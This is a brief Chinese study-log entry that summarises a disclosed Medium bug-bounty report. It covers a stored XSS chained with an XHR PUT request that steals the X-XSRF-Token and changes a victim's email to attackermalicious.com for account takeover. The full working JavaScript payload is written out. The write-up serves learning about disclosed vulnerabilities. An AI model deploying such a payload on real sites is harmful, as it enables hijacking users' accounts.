学习日志2:存储型XSS+XHR构造PUT请求实现账号劫持 摘自freebuf出处https://www.freebuf.com/vuls/211253.html漏洞出处Medium关键点1.登陆后的用户可以修改注册邮箱且此步骤不需要进行验证可以向该邮箱发送包含临时登录的URL链接。2.关键cookie被设置了HTTPonly。3.HTTP头中存在X-XSRF-Token可以使用js盗取。漏洞发现过程发现博客文章中jAvAsCrIpT:confirm()可以实现弹窗即存在存储型XSS但cookie无法盗取。构造请求发现HTTP头中存在X-XSRF-Token。结果利用存储型XSS利用XHR构造PUT请求设置HTTP头其中包含用js获取的X-XSRF-Token请求具体内容为修改用户注册邮箱。最终向自定义的该邮箱发送一条包含临时登录的URL链接实现账号劫持。最终payloadJaVaScRiPt:var xwindow.preloaded_state.session.xsrf;var h new XMLHttpRequest();h.open(‘PUT’, ‘/me/email’, true);h.setRequestHeader(‘Content-Type’, ‘application/json’);h.setRequestHeader(‘X-XSRF-Token’, x);h.send(‘{“email”:”attackermalicious.com”}’);思考1.向自定义的该邮箱发送一条包含临时登录的URL链接包含临时登陆的URL链接不太清楚这里的原理。2.Medium安全团队响应并奖励$1000美金感觉漏洞很简单。。居然这么多奖金0.0